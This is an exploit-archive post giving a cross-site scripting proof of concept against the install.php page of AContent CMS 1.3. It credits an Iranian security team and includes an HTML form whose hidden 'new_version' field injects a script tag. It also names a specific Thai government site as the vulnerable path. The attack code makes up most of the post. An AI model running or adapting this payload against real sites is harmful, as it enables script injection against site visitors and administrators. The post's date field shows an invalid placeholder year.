AContent Content Management System Cross Site Scripting

Posted on 30 November -0001
<HTML><HEAD><TITLE>AContent Content Management System Cross Site Scripting</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
|=============================================================|
|[+] Exploit Title:  Cross Site Scripting in AContent Content Management System
|[+]
|[+] Exploit Author: Ashiyane Digital Security Team
|[+]
|[+] Download Link : https://sourceforge.net/projects/acontent/files/AContent-1.3.tar.gz/download
|[+] Version : 1.3
|[+]
|[+] Vendor : http://www.atutor.ca/acontent/
|[+]
|[+] Tested on:  Kali Linux 
|[+]
|[+] Date: 12 /29 / 2016
|=============================================================|
|[+] Vuln Path : http://www.site.go.th/AContent/install/install.php
|[+] Method : POST
|=============================================================|
|[+] Exploit Code: 
 
<form action="127.0.0.1/5/AContent/install/install.php" method="post" name="form">
    <input type="hidden" name="action" value="process" />
    <input type="hidden" name="step" value="1" />
    <input type="hidden" name="new_version" value="1.3'"/><ScRiPt >alert(123)</ScRiPt>" />
    
    <input type="submit" name="submit" class="button" value="I Agree" /> 
        <input type="submit" name="submit" class="button" value="I Disagree" /><br />
    
</form>

|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
|[+] Discovered By : M.R.S.L.Y
|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| </BODY></HTML>
TOP
Malware :

Last 20
Exploits :

Last 20